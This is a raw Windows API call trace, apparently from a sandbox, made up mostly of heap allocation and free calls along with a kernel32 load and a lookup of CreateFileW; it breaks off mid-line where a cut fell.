[0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0105.682] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0105.683] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0105.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0105.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0105.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0105.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0105.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0105.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0105.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0105.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0105.686] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0105.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0105.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.689] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.692] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0105.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cacd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.692] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.693] RtlAllocateHeap (HeapHandle=0x1780000, 